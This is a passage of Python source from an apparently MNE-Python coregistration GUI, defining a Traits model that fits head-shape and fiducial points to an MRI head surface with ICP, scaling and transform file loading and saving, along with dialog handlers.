Handler, Label, Spring, InstanceEditor, StatusItem,
UIInfo)
from traitsui.menu import Action, UndoButton, CancelButton, NoButtons
from tvtk.pyface.scene_editor import SceneEditor
from ..bem import make_bem_solution, write_bem_solution
from ..coreg import bem_fname, trans_fname
from ..defaults import DEFAULTS
from ..surface import _DistanceQuery, _CheckInside
from ..transforms import (write_trans, read_trans, apply_trans, rotation,
rotation_angles, Transform, _ensure_trans,
rot_to_quat, _angle_between_quats)
from ..coreg import fit_matched_points, scale_mri, _find_fiducials_files
from ..viz.backends._pysurfer_mayavi import _toggle_mlab_render
from ..utils import logger, set_config, _pl
from ._fiducials_gui import MRIHeadWithFiducialsModel, FiducialsPanel
from ._file_traits import trans_wildcard, DigSource, SubjectSelectorPanel
from ._viewer import (HeadViewController, PointObject, SurfaceObject,
_DEG_WIDTH, _MM_WIDTH, _BUTTON_WIDTH,
_SHOW_BORDER, _COREG_WIDTH, _SCALE_STEP_WIDTH,
_INC_BUTTON_WIDTH, _SCALE_WIDTH, _WEIGHT_WIDTH,
_MM_STEP_WIDTH, _DEG_STEP_WIDTH, _REDUCED_TEXT_WIDTH,
_RESET_LABEL, _RESET_WIDTH,
laggy_float_editor_scale, laggy_float_editor_deg,
laggy_float_editor_mm, laggy_float_editor_weight)
try:
from traitsui.api import RGBColor
except ImportError:
from traits.api import RGBColor
defaults = DEFAULTS['coreg']
class busy(object):
"""Set the GUI state to busy."""
def __enter__(self): # noqa: D105
GUI.set_busy(True)
def __exit__(self, type, value, traceback): # noqa: D105
GUI.set_busy(False)
def _pass(x):
"""Format text without changing it."""
return x
class CoregModel(HasPrivateTraits):
"""Traits object for estimating the head mri transform.
Notes
-----
Transform from head to mri space is modelled with the following steps:
* move the head shape to its nasion position
* rotate the head shape with user defined rotation around its nasion
* move the head shape by user defined translation
* move the head shape origin to the mri nasion
If MRI scaling is enabled,
* the MRI is scaled relative to its origin center (prior to any
transformation of the digitizer head)
Don't sync transforms to anything to prevent them from being recomputed
upon every parameter change.
"""
# data sources
mri = Instance(MRIHeadWithFiducialsModel, ())
hsp = Instance(DigSource, ())
# parameters
guess_mri_subject = Bool(True) # change MRI subject when dig file changes
grow_hair = Float(label=u"ΔHair", desc="Move the back of the MRI "
"head outwards to compensate for hair on the digitizer "
"head shape (mm)")
n_scale_params = Enum(0, 1, 3, desc="Scale the MRI to better fit the "
"subject's head shape (a new MRI subject will be "
"created with a name specified upon saving)")
scale_x = Float(100, label="X")
scale_y = Float(100, label="Y")
scale_z = Float(100, label="Z")
trans_x = Float(0, label=u"ΔX")
trans_y = Float(0, label=u"ΔY")
trans_z = Float(0, label=u"ΔZ")
rot_x = Float(0, label=u"∠X")
rot_y = Float(0, label=u"∠Y")
rot_z = Float(0, label=u"∠Z")
parameters = List()
last_parameters = List()
lpa_weight = Float(1.)
nasion_weight = Float(10.)
rpa_weight = Float(1.)
hsp_weight = Float(1.)
eeg_weight = Float(1.)
hpi_weight = Float(1.)
iteration = Int(-1)
icp_iterations = Int(20)
icp_start_time = Float(0.0)
icp_angle = Float(0.2)
icp_distance = Float(0.2)
icp_scale = Float(0.2)
icp_fid_match = Enum('nearest', 'matched')
fit_icp_running = Bool(False)
fits_icp_running = Bool(False)
coord_frame = Enum('mri', 'head', desc='Display coordinate frame')
status_text = Str()
# options during scaling
scale_labels = Bool(True, desc="whether to scale *.label files")
copy_annot = Bool(True, desc="whether to copy *.annot files for scaled "
"subject")
prepare_bem_model = Bool(True, desc="whether to run make_bem_solution "
"after scaling the MRI")
# secondary to parameters
has_nasion_data = Property(
Bool, depends_on=['mri:nasion', 'hsp:nasion'])
has_lpa_data = Property(
Bool, depends_on=['mri:lpa', 'hsp:lpa'])
has_rpa_data = Property(
Bool, depends_on=['mri:rpa', 'hsp:rpa'])
has_fid_data = Property( # conjunction
Bool, depends_on=['has_nasion_data', 'has_lpa_data', 'has_rpa_data'])
has_mri_data = Property(
Bool, depends_on=['transformed_high_res_mri_points'])
has_hsp_data = Property(
Bool, depends_on=['has_mri_data', 'hsp:points'])
has_eeg_data = Property(
Bool, depends_on=['has_mri_data', 'hsp:eeg_points'])
has_hpi_data = Property(
Bool, depends_on=['has_mri_data', 'hsp:hpi_points'])
n_icp_points = Property(
Int, depends_on=['has_nasion_data', 'nasion_weight',
'has_lpa_data', 'lpa_weight',
'has_rpa_data', 'rpa_weight',
'hsp:points', 'hsp_weight',
'hsp:eeg_points', 'eeg_weight',
'hsp:hpi_points', 'hpi_weight'])
changes = Property(depends_on=['parameters', 'last_parameters'])
# target transforms
mri_head_t = Property(
desc="Transformation of the scaled MRI to the head coordinate frame.",
depends_on=['parameters[]'])
head_mri_t = Property(depends_on=['mri_head_t'])
mri_trans_noscale = Property(depends_on=['mri_head_t', 'coord_frame'])
mri_trans = Property(depends_on=['mri_trans_noscale', 'parameters[]'])
hsp_trans = Property(depends_on=['head_mri_t', 'coord_frame'])
# info
subject_has_bem = DelegatesTo('mri')
lock_fiducials = DelegatesTo('mri')
can_prepare_bem_model = Property(
Bool,
depends_on=['n_scale_params', 'subject_has_bem'])
can_save = Property(Bool, depends_on=['mri_head_t'])
raw_subject = Property(
desc="Subject guess based on the raw file name.",
depends_on=['hsp:inst_fname'])
# Always computed in the MRI coordinate frame for speed
# (building the nearest-neighbor tree is slow!)
# though it will always need to be rebuilt in (non-uniform) scaling mode
nearest_calc = Instance(_DistanceQuery)
# MRI geometry transformed to viewing coordinate system
processed_high_res_mri_points = Property(
depends_on=['mri:bem_high_res:surf', 'grow_hair'])
processed_low_res_mri_points = Property(
depends_on=['mri:bem_low_res:surf', 'grow_hair'])
transformed_high_res_mri_points = Property(
depends_on=['processed_high_res_mri_points', 'mri_trans'])
transformed_low_res_mri_points = Property(
depends_on=['processed_low_res_mri_points', 'mri_trans'])
nearest_transformed_high_res_mri_idx_lpa = Property(
depends_on=['nearest_calc', 'hsp:lpa', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_nasion = Property(
depends_on=['nearest_calc', 'hsp:nasion', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_rpa = Property(
depends_on=['nearest_calc', 'hsp:rpa', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_hsp = Property(
depends_on=['nearest_calc', 'hsp:points', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_orig_hsp = Property(
depends_on=['nearest_calc', 'hsp:points', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_eeg = Property(
depends_on=['nearest_calc', 'hsp:eeg_points', 'head_mri_t'])
nearest_transformed_high_res_mri_idx_hpi = Property(
depends_on=['nearest_calc', 'hsp:hpi_points', 'head_mri_t'])
transformed_mri_lpa = Property(
depends_on=['mri:lpa', 'mri_trans'])
transformed_mri_nasion = Property(
depends_on=['mri:nasion', 'mri_trans'])
transformed_mri_rpa = Property(
depends_on=['mri:rpa', 'mri_trans'])
# HSP geometry transformed to viewing coordinate system
transformed_hsp_points = Property(
depends_on=['hsp:points', 'hsp_trans'])
transformed_orig_hsp_points = Property(
depends_on=['hsp:_hsp_points', 'hsp_trans'])
transformed_hsp_lpa = Property(
depends_on=['hsp:lpa', 'hsp_trans'])
transformed_hsp_nasion = Property(
depends_on=['hsp:nasion', 'hsp_trans'])
transformed_hsp_rpa = Property(
depends_on=['hsp:rpa', 'hsp_trans'])
transformed_hsp_eeg_points = Property(
depends_on=['hsp:eeg_points', 'hsp_trans'])
transformed_hsp_hpi = Property(
depends_on=['hsp:hpi_points', 'hsp_trans'])
# fit properties
lpa_distance = Property(
depends_on=['transformed_mri_lpa', 'transformed_hsp_lpa'])
nasion_distance = Property(
depends_on=['transformed_mri_nasion', 'transformed_hsp_nasion'])
rpa_distance = Property(
depends_on=['transformed_mri_rpa', 'transformed_hsp_rpa'])
point_distance = Property( # use low res points
depends_on=['nearest_transformed_high_res_mri_idx_hsp',
'nearest_transformed_high_res_mri_idx_eeg',
'nearest_transformed_high_res_mri_idx_hpi',
'hsp_weight',
'eeg_weight',
'hpi_weight'])
orig_hsp_point_distance = Property( # use low res points
depends_on=['nearest_transformed_high_res_mri_idx_orig_hsp',
'hpi_weight'])
# fit property info strings
fid_eval_str = Property(
depends_on=['lpa_distance', 'nasion_distance', 'rpa_distance'])
points_eval_str = Property(
depends_on=['point_distance'])
def _parameters_default(self):
return list(_DEFAULT_PARAMETERS)
def _last_parameters_default(self):
return list(_DEFAULT_PARAMETERS)
@cached_property
def _get_can_prepare_bem_model(self):
return self.subject_has_bem and self.n_scale_params > 0
@cached_property
def _get_can_save(self):
return np.any(self.mri_head_t != np.eye(4))
@cached_property
def _get_has_lpa_data(self):
return (np.any(self.mri.lpa) and np.any(self.hsp.lpa))
@cached_property
def _get_has_nasion_data(self):
return (np.any(self.mri.nasion) and np.any(self.hsp.nasion))
@cached_property
def _get_has_rpa_data(self):
return (np.any(self.mri.rpa) and np.any(self.hsp.rpa))
@cached_property
def _get_has_fid_data(self):
return self.has_nasion_data and self.has_lpa_data and self.has_rpa_data
@cached_property
def _get_has_mri_data(self):
return len(self.transformed_high_res_mri_points) > 0
@cached_property
def _get_has_hsp_data(self):
return (self.has_mri_data and
len(self.nearest_transformed_high_res_mri_idx_hsp) > 0)
@cached_property
def _get_has_eeg_data(self):
return (self.has_mri_data and
len(self.nearest_transformed_high_res_mri_idx_eeg) > 0)
@cached_property
def _get_has_hpi_data(self):
return (self.has_mri_data and
len(self.nearest_transformed_high_res_mri_idx_hpi) > 0)
@cached_property
def _get_n_icp_points(self):
"""Get parameters for an ICP iteration."""
n = (self.hsp_weight > 0) * len(self.hsp.points)
for key in ('lpa', 'nasion', 'rpa'):
if getattr(self, 'has_%s_data' % key):
n += 1
n += (self.eeg_weight > 0) * len(self.hsp.eeg_points)
n += (self.hpi_weight > 0) * len(self.hsp.hpi_points)
return n
@cached_property
def _get_changes(self):
new = np.array(self.parameters, float)
old = np.array(self.last_parameters, float)
move = np.linalg.norm(old[3:6] - new[3:6]) * 1e3
angle = np.rad2deg(_angle_between_quats(
rot_to_quat(rotation(*new[:3])[:3, :3]),
rot_to_quat(rotation(*old[:3])[:3, :3])))
percs = 100 * (new[6:] - old[6:]) / old[6:]
return move, angle, percs
@cached_property
def _get_mri_head_t(self):
# rotate and translate hsp
trans = rotation(*self.parameters[:3])
trans[:3, 3] = np.array(self.parameters[3:6])
return trans
@cached_property
def _get_head_mri_t(self):
trans = rotation(*self.parameters[:3]).T
trans[:3, 3] = -np.dot(trans[:3, :3], self.parameters[3:6])
# should be the same as np.linalg.inv(self.mri_head_t)
return trans
@cached_property
def _get_processed_high_res_mri_points(self):
return self._get_processed_mri_points('high')
@cached_property
def _get_processed_low_res_mri_points(self):
return self._get_processed_mri_points('low')
def _get_processed_mri_points(self, res):
bem = self.mri.bem_low_res if res == 'low' else self.mri.bem_high_res
if self.grow_hair:
if len(bem.surf.nn):
scaled_hair_dist = (1e-3 * self.grow_hair /
np.array(self.parameters[6:9]))
points = bem.surf.rr.copy()
hair = points[:, 2] > points[:, 1]
points[hair] += bem.surf.nn[hair] * scaled_hair_dist
return points
else:
error(None, "Norms missing from bem, can't grow hair")
self.grow_hair = 0
else:
return bem.surf.rr
@cached_property
def _get_mri_trans(self):
t = self.mri_trans_noscale.copy()
t[:, :3] *= self.parameters[6:9]
return t
@cached_property
def _get_mri_trans_noscale(self):
if self.coord_frame == 'head':
t = self.mri_head_t
else:
t = np.eye(4)
return t
@cached_property
def _get_hsp_trans(self):
if self.coord_frame == 'head':
t = np.eye(4)
else:
t = self.head_mri_t
return t
@cached_property
def _get_nearest_transformed_high_res_mri_idx_lpa(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.lpa))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_nasion(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.nasion))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_rpa(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.rpa))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_hsp(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.points))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_orig_hsp(self):
# This is redundant to some extent with the one above due to
# overlapping points, but it's fast and the refactoring to
# remove redundancy would be a pain.
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp._hsp_points))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_eeg(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.eeg_points))[1]
@cached_property
def _get_nearest_transformed_high_res_mri_idx_hpi(self):
return self.nearest_calc.query(
apply_trans(self.head_mri_t, self.hsp.hpi_points))[1]
# MRI view-transformed data
@cached_property
def _get_transformed_low_res_mri_points(self):
points = apply_trans(self.mri_trans,
self.processed_low_res_mri_points)
return points
def _nearest_calc_default(self):
return _DistanceQuery(
self.processed_high_res_mri_points * self.parameters[6:9])
@on_trait_change('processed_high_res_mri_points')
def _update_nearest_calc(self):
self.nearest_calc = self._nearest_calc_default()
@cached_property
def _get_transformed_high_res_mri_points(self):
points = apply_trans(self.mri_trans,
self.processed_high_res_mri_points)
return points
@cached_property
def _get_transformed_mri_lpa(self):
return apply_trans(self.mri_trans, self.mri.lpa)
@cached_property
def _get_transformed_mri_nasion(self):
return apply_trans(self.mri_trans, self.mri.nasion)
@cached_property
def _get_transformed_mri_rpa(self):
return apply_trans(self.mri_trans, self.mri.rpa)
# HSP view-transformed data
@cached_property
def _get_transformed_hsp_points(self):
return apply_trans(self.hsp_trans, self.hsp.points)
@cached_property
def _get_transformed_orig_hsp_points(self):
return apply_trans(self.hsp_trans, self.hsp._hsp_points)
@cached_property
def _get_transformed_hsp_lpa(self):
return apply_trans(self.hsp_trans, self.hsp.lpa)
@cached_property
def _get_transformed_hsp_nasion(self):
return apply_trans(self.hsp_trans, self.hsp.nasion)
@cached_property
def _get_transformed_hsp_rpa(self):
return apply_trans(self.hsp_trans, self.hsp.rpa)
@cached_property
def _get_transformed_hsp_eeg_points(self):
return apply_trans(self.hsp_trans, self.hsp.eeg_points)
@cached_property
def _get_transformed_hsp_hpi(self):
return apply_trans(self.hsp_trans, self.hsp.hpi_points)
# Distances, etc.
@cached_property
def _get_lpa_distance(self):
d = np.ravel(self.transformed_mri_lpa - self.transformed_hsp_lpa)
return np.linalg.norm(d)
@cached_property
def _get_nasion_distance(self):
d = np.ravel(self.transformed_mri_nasion - self.transformed_hsp_nasion)
return np.linalg.norm(d)
@cached_property
def _get_rpa_distance(self):
d = np.ravel(self.transformed_mri_rpa - self.transformed_hsp_rpa)
return np.linalg.norm(d)
@cached_property
def _get_point_distance(self):
mri_points = list()
hsp_points = list()
if self.hsp_weight > 0 and self.has_hsp_data:
mri_points.append(self.transformed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_hsp])
hsp_points.append(self.transformed_hsp_points)
assert len(mri_points[-1]) == len(hsp_points[-1])
if self.eeg_weight > 0 and self.has_eeg_data:
mri_points.append(self.transformed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_eeg])
hsp_points.append(self.transformed_hsp_eeg_points)
assert len(mri_points[-1]) == len(hsp_points[-1])
if self.hpi_weight > 0 and self.has_hpi_data:
mri_points.append(self.transformed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_hpi])
hsp_points.append(self.transformed_hsp_hpi)
assert len(mri_points[-1]) == len(hsp_points[-1])
if all(len(h) == 0 for h in hsp_points):
return None
mri_points = np.concatenate(mri_points)
hsp_points = np.concatenate(hsp_points)
return np.linalg.norm(mri_points - hsp_points, axis=-1)
@cached_property
def _get_orig_hsp_point_distance(self):
mri_points = self.transformed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_orig_hsp]
hsp_points = self.transformed_orig_hsp_points
return np.linalg.norm(mri_points - hsp_points, axis=-1)
@cached_property
def _get_fid_eval_str(self):
d = (self.lpa_distance * 1000, self.nasion_distance * 1000,
self.rpa_distance * 1000)
return u'Fiducials: %.1f, %.1f, %.1f mm' % d
@cached_property
def _get_points_eval_str(self):
if self.point_distance is None:
return ""
dists = 1000 * self.point_distance
av_dist = np.mean(dists)
std_dist = np.std(dists)
kinds = [kind for kind, check in
(('HSP', self.hsp_weight > 0 and self.has_hsp_data),
('EEG', self.eeg_weight > 0 and self.has_eeg_data),
('HPI', self.hpi_weight > 0 and self.has_hpi_data))
if check]
return (u"%s %s: %.1f ± %.1f mm"
% (len(dists), '+'.join(kinds), av_dist, std_dist))
def _get_raw_subject(self):
# subject name guessed based on the inst file name
if '_' in self.hsp.inst_fname:
subject, _ = self.hsp.inst_fname.split('_', 1)
if subject:
return subject
@on_trait_change('raw_subject')
def _on_raw_subject_change(self, subject):
if self.guess_mri_subject:
if subject in self.mri.subject_source.subjects:
self.mri.subject = subject
elif 'fsaverage' in self.mri.subject_source.subjects:
self.mri.subject = 'fsaverage'
def omit_hsp_points(self, distance):
"""Exclude head shape points that are far away from the MRI head.
Parameters
----------
distance : float
Exclude all points that are further away from the MRI head than
this distance. Previously excluded points are still excluded unless
reset=True is specified. A value of distance <= 0 excludes nothing.
reset : bool
Reset the filter before calculating new omission (default is
False).
"""
distance = float(distance)
if distance <= 0:
return
# find the new filter
mask = self.orig_hsp_point_distance <= distance
n_excluded = np.sum(~mask)
logger.info("Coregistration: Excluding %i head shape points with "
"distance >= %.3f m.", n_excluded, distance)
# set the filter
with warnings.catch_warnings(record=True): # comp to None in Traits
self.hsp.points_filter = mask
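    # A minimal usage sketch (assuming a fully initialized CoregModel named
    # ``model`` with head-shape and MRI data loaded):
    #
    #     model.omit_hsp_points(10e-3)   # drop points > 10 mm from the scalp
    #     model.omit_hsp_points(np.inf)  # include every point again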
def fit_fiducials(self, n_scale_params=None):
"""Find rotation and translation to fit all 3 fiducials."""
if n_scale_params is None:
n_scale_params = self.n_scale_params
head_pts = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
mri_pts = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
weights = [self.lpa_weight, self.nasion_weight, self.rpa_weight]
assert n_scale_params in (0, 1) # guaranteed by GUI
if n_scale_params == 0:
mri_pts *= self.parameters[6:9] # not done in fit_matched_points
x0 = np.array(self.parameters[:6 + n_scale_params])
est = fit_matched_points(mri_pts, head_pts, x0=x0, out='params',
scale=n_scale_params, weights=weights)
if n_scale_params == 0:
self.parameters[:6] = est
else:
self.parameters[:] = np.concatenate([est, [est[-1]] * 2])
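    # Note: ``self.parameters`` is the 9-element state vector used throughout
    # this model: [rot_x, rot_y, rot_z] in radians, [trans_x, trans_y,
    # trans_z] in meters, and [scale_x, scale_y, scale_z] as fractions (see
    # _DEFAULT_PARAMETERS and _parameters_items_changed below).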
def _setup_icp(self, n_scale_params):
"""Get parameters for an ICP iteration."""
head_pts = list()
mri_pts = list()
weights = list()
if self.has_hsp_data and self.hsp_weight > 0: # should be true
head_pts.append(self.hsp.points)
mri_pts.append(self.processed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_hsp])
weights.append(np.full(len(head_pts[-1]), self.hsp_weight))
for key in ('lpa', 'nasion', 'rpa'):
if getattr(self, 'has_%s_data' % key):
head_pts.append(getattr(self.hsp, key))
if self.icp_fid_match == 'matched':
mri_pts.append(getattr(self.mri, key))
else:
assert self.icp_fid_match == 'nearest'
mri_pts.append(self.processed_high_res_mri_points[
getattr(self, 'nearest_transformed_high_res_mri_idx_%s'
% (key,))])
weights.append(np.full(len(mri_pts[-1]),
getattr(self, '%s_weight' % key)))
if self.has_eeg_data and self.eeg_weight > 0:
head_pts.append(self.hsp.eeg_points)
mri_pts.append(self.processed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_eeg])
weights.append(np.full(len(mri_pts[-1]), self.eeg_weight))
if self.has_hpi_data and self.hpi_weight > 0:
head_pts.append(self.hsp.hpi_points)
mri_pts.append(self.processed_high_res_mri_points[
self.nearest_transformed_high_res_mri_idx_hpi])
weights.append(np.full(len(mri_pts[-1]), self.hpi_weight))
head_pts = np.concatenate(head_pts)
mri_pts = np.concatenate(mri_pts)
weights = np.concatenate(weights)
if n_scale_params == 0:
mri_pts *= self.parameters[6:9] # not done in fit_matched_points
return head_pts, mri_pts, weights
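    # _setup_icp returns equal-length, index-matched head_pts/mri_pts/weights
    # arrays; fit_icp calls it once per iteration so that every head point is
    # re-paired with its current nearest MRI surface point before the next
    # fit_matched_points step.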
def fit_icp(self, n_scale_params=None):
"""Find MRI scaling, translation, and rotation to match HSP."""
if n_scale_params is None:
n_scale_params = self.n_scale_params
# Initial guess (current state)
assert n_scale_params in (0, 1, 3)
est = self.parameters[:[6, 7, None, 9][n_scale_params]]
# Do the fits, assigning and evaluating at each step
attr = 'fit_icp_running' if n_scale_params == 0 else 'fits_icp_running'
setattr(self, attr, True)
GUI.process_events() # update the cancel button
self.icp_start_time = time.time()
for self.iteration in range(self.icp_iterations):
head_pts, mri_pts, weights = self._setup_icp(n_scale_params)
est = fit_matched_points(mri_pts, head_pts, scale=n_scale_params,
x0=est, out='params', weights=weights)
if n_scale_params == 0:
self.parameters[:6] = est
elif n_scale_params == 1:
self.parameters[:] = list(est) + [est[-1]] * 2
else:
self.parameters[:] = est
angle, move, scale = self.changes
if angle <= self.icp_angle and move <= self.icp_distance and \
all(scale <= self.icp_scale):
self.status_text = self.status_text[:-1] + '; converged)'
break
if not getattr(self, attr): # canceled by user
self.status_text = self.status_text[:-1] + '; cancelled)'
break
GUI.process_events() # this will update the head view
else:
self.status_text = self.status_text[:-1] + '; did not converge)'
setattr(self, attr, False)
self.iteration = -1
def get_scaling_job(self, subject_to, skip_fiducials):
"""Find all arguments needed for the scaling worker."""
subjects_dir = self.mri.subjects_dir
subject_from = self.mri.subject
bem_names = []
if self.can_prepare_bem_model and self.prepare_bem_model:
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_from, name='(.+-bem)')
bem_dir, pattern = os.path.split(pattern)
for filename in os.listdir(bem_dir):
match = re.match(pattern, filename)
if match:
bem_names.append(match.group(1))
return (subjects_dir, subject_from, subject_to, self.parameters[6:9],
skip_fiducials, self.scale_labels, self.copy_annot, bem_names)
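    # The tuple returned above is the job format consumed by the scaling
    # worker thread set up in CoregPanel.__init__: (subjects_dir,
    # subject_from, subject_to, scale, skip_fiducials, include_labels,
    # include_annot, bem_names).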
def load_trans(self, fname):
"""Load the head-mri transform from a fif file.
Parameters
----------
fname : str
File path.
"""
self.set_trans(_ensure_trans(read_trans(fname, return_all=True),
'mri', 'head')['trans'])
def reset(self):
"""Reset all the parameters affecting the coregistration."""
with busy():
self.reset_traits(('grow_hair', 'n_scaling_params'))
self.parameters[:] = _DEFAULT_PARAMETERS
self.omit_hsp_points(np.inf)
def set_trans(self, mri_head_t):
"""Set rotation and translation params from a transformation matrix.
Parameters
----------
mri_head_t : array, shape (4, 4)
Transformation matrix from MRI to head space.
"""
with busy():
rot_x, rot_y, rot_z = rotation_angles(mri_head_t)
x, y, z = mri_head_t[:3, 3]
self.parameters[:6] = [rot_x, rot_y, rot_z, x, y, z]
def save_trans(self, fname):
"""Save the head-mri transform as a fif file.
Parameters
----------
fname : str
Target file path.
"""
if not self.can_save:
raise RuntimeError("Not enough information for saving transform")
write_trans(fname, Transform('head', 'mri', self.head_mri_t))
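    # A minimal usage sketch for the transform I/O above (file names are
    # placeholders): load_trans() reads a -trans.fif file and updates the
    # rotation/translation parameters, save_trans() writes the current
    # head->MRI transform.
    #
    #     model.load_trans('sample-trans.fif')
    #     model.save_trans('sample-new-trans.fif')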
def _parameters_items_changed(self):
# Update GUI as necessary
n_scale = self.n_scale_params
for ii, key in enumerate(('rot_x', 'rot_y', 'rot_z')):
val = np.rad2deg(self.parameters[ii])
if val != getattr(self, key): # prevent circular
setattr(self, key, val)
for ii, key in enumerate(('trans_x', 'trans_y', 'trans_z')):
val = self.parameters[ii + 3] * 1e3
if val != getattr(self, key): # prevent circular
setattr(self, key, val)
for ii, key in enumerate(('scale_x', 'scale_y', 'scale_z')):
val = self.parameters[ii + 6] * 1e2
if val != getattr(self, key): # prevent circular
setattr(self, key, val)
# Only update our nearest-neighbor if necessary
if self.parameters[6:9] != self.last_parameters[6:9]:
self._update_nearest_calc()
# Update the status text
move, angle, percs = self.changes
text = u'Change: Δ=%0.1f mm ∠=%0.2f°' % (move, angle)
if n_scale:
text += ' Scale ' if n_scale == 1 else ' Sx/y/z '
text += '/'.join(['%+0.1f%%' % p for p in percs[:n_scale]])
if self.iteration >= 0:
text += u' (iteration %d/%d, %0.1f sec)' % (
self.iteration + 1, self.icp_iterations,
time.time() - self.icp_start_time)
self.last_parameters[:] = self.parameters[:]
self.status_text = text
def _rot_x_changed(self):
self.parameters[0] = np.deg2rad(self.rot_x)
def _rot_y_changed(self):
self.parameters[1] = np.deg2rad(self.rot_y)
def _rot_z_changed(self):
self.parameters[2] = np.deg2rad(self.rot_z)
def _trans_x_changed(self):
self.parameters[3] = self.trans_x * 1e-3
def _trans_y_changed(self):
self.parameters[4] = self.trans_y * 1e-3
def _trans_z_changed(self):
self.parameters[5] = self.trans_z * 1e-3
def _scale_x_changed(self):
if self.n_scale_params == 1:
self.parameters[6:9] = [self.scale_x * 1e-2] * 3
else:
self.parameters[6] = self.scale_x * 1e-2
def _scale_y_changed(self):
self.parameters[7] = self.scale_y * 1e-2
def _scale_z_changed(self):
self.parameters[8] = self.scale_z * 1e-2
class CoregFrameHandler(Handler):
"""Check for unfinished processes before closing its window."""
def object_title_changed(self, info):
"""Set the title when it gets changed."""
info.ui.title = info.object.title
def close(self, info, is_ok):
"""Handle the close event."""
if info.object.queue.unfinished_tasks:
information(None, "Can not close the window while saving is still "
"in progress. Please wait until all MRIs are "
"processed.", "Saving Still in Progress")
return False
else:
try: # works on Qt only for now
size = (info.ui.control.width(), info.ui.control.height())
except AttributeError:
size = None
# store configuration, but don't prevent from closing on error
try:
info.object.save_config(size=size)
except Exception as exc:
warnings.warn("Error saving GUI configuration:\n%s" % (exc,))
return True
class CoregPanelHandler(Handler):
"""Open other windows with proper parenting."""
info = Instance(UIInfo)
def object_fitting_options_panel_changed(self, info): # noqa: D102
self.info = info
def object_fitting_options_changed(self, info): # noqa: D102
self.info.object.fitting_options_panel.edit_traits(
parent=self.info.ui.control)
def object_load_trans_changed(self, info): # noqa: D102
# find trans file destination
model = self.info.object.model
raw_dir = os.path.dirname(model.hsp.file)
subject = model.mri.subject
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject)
dlg = FileDialog(action="open", wildcard=trans_wildcard,
default_path=trans_file, parent=self.info.ui.control)
if dlg.open() != OK:
return
trans_file = dlg.path
try:
model.load_trans(trans_file)
except Exception as e:
error(None, "Error loading trans file %s: %s (See terminal "
"for details)" % (trans_file, e), "Error Loading Trans File")
raise
def object_save_changed(self, info): # noqa: D102
obj = self.info.object
subjects_dir = obj.model.mri.subjects_dir
subject_from = obj.model.mri.subject
# check that fiducials are saved
skip_fiducials = False
if obj.n_scale_params and not _find_fiducials_files(subject_from,
subjects_dir):
msg = ("No fiducials file has been found for {src}. If fiducials "
"are not saved, they will not be available in the scaled "
"MRI. Should the current fiducials be saved now? "
"Select Yes to save the fiducials at "
"{src}/bem/{src}-fiducials.fif. "
"Select No to proceed scaling the MRI without fiducials.".
format(src=subject_from))
title = "Save Fiducials for %s?" % subject_from
rc = confirm(self.info.ui.control, msg, title, cancel=True,
default=CANCEL)
if rc == CANCEL:
return
elif rc == YES:
obj.model.mri.save(obj.model.mri.default_fid_fname)
elif rc == NO:
skip_fiducials = True
else:
raise RuntimeError("rc=%s" % repr(rc))
# find target subject
if obj.n_scale_params:
subject_to = obj.model.raw_subject or subject_from
mridlg = NewMriDialog(subjects_dir=subjects_dir,
subject_from=subject_from,
subject_to=subject_to)
ui = mridlg.edit_traits(kind='modal',
parent=self.info.ui.control)
if not ui.result: # i.e., user pressed cancel
return
subject_to = mridlg.subject_to
else:
subject_to = subject_from
# find trans file destination
raw_dir = os.path.dirname(obj.model.hsp.file)
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject_to)
dlg = FileDialog(action="save as", wildcard=trans_wildcard,
default_path=trans_file,
parent=self.info.ui.control)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
if not trans_file.endswith('.fif'):
trans_file += '.fif'
if os.path.exists(trans_file):
answer = confirm(None, "The file %r already exists. Should it "
"be replaced?", "Overwrite File?")
if answer != YES:
return
# save the trans file
try:
obj.model.save_trans(trans_file)
except Exception as e:
error(None, "Error saving -trans.fif file: %s (See terminal for "
"details)" % (e,), "Error Saving Trans File")
raise
# save the scaled MRI
if obj.n_scale_params:
job = obj.model.get_scaling_job(subject_to, skip_fiducials)
obj.queue.put(job)
obj.queue_len += 1
def _make_view_data_panel(scrollable=False):
view = View(VGroup(
VGroup(Item('subject_panel', style='custom'), label="MRI Subject",
show_border=_SHOW_BORDER, show_labels=False),
VGroup(Item('lock_fiducials', style='custom',
editor=EnumEditor(cols=2, values={False: '2:Edit',
True: '1:Lock'}),
enabled_when='fid_ok'),
HGroup(Item('hsp_always_visible',
label='Show head shape points', show_label=True,
enabled_when='not lock_fiducials', width=-1),
show_left=False),
Item('fid_panel', style='custom'), label="MRI Fiducials",
show_border=_SHOW_BORDER, show_labels=False),
VGroup(Item('raw_src', style="custom"),
HGroup('guess_mri_subject',
Label('Guess subject from name'), show_labels=False),
VGrid(Item('grow_hair', editor=laggy_float_editor_mm,
width=_MM_WIDTH),
Label(u'ΔHair', show_label=True, width=-1), '0',
Item('distance', show_label=False, width=_MM_WIDTH,
editor=laggy_float_editor_mm),
Item('omit_points', width=_BUTTON_WIDTH),
Item('reset_omit_points', width=_RESET_WIDTH),
